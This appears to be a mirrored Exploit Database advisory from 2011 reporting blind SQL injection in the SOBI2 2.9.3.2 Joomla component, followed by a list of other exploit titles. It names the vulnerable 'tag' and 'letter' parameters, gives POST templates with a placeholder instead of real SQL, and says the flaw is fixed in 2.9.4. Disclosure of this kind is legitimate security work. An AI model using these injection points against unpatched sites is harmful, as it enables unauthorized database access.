Joomla! Component com_sobi2 2.9.3.2 – Blind SQL Injections

Exploit Database
100 阅读

作者： jdc

日期： 2011-07-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17530/

# Exploit Title: SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections
# Date: 13 July 2011
# Author: jdc
# Software Link: http://www.sigsiu.net
# Version: 2.9.3.2
# Fixed In: 2.9.4
# Verified: http://www.sigsiu.net/changelog as "# Bugfix: Blind SQL injection"

Versions prior to 2.9.4 suffer from a blind sql injection in both the "tag" and "letter" parameters. The request MUST reach the site with these parameters urlencoded for the injection to succeed.

POSTDATA: option=com_sobi2&tmpl=component&tag=[Encoded SQL]

POSTDATA: option=com_sobi2&tmpl=component&letter=[Encoded SQL]

Updated release: http://www.sigsiu.net/latest_news/sobi2_version_2.9.4_released.html

last Exploits
Joomla! Component com_sobi2 2.9.3.2 – Blind SQL Injections的更多信息

Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE：
Joomla! Component JE Media Player – Local File Inclusion：
reos 2.0.5 – Multiple Vulnerabilities：
CSE Bookstore 1.0 – ‘quantity’ Persistent Cross-site Scripting：
Joomla! Component com_photo – Multiple SQL Injections：
Complaint Management System 1.0 – ‘cid’ SQL Injection：
PhpSocial 2.0.0304_20222226 – Cross-Site Request Forgery：
XYZ Auto Classifieds 1.0 – SQL Injection：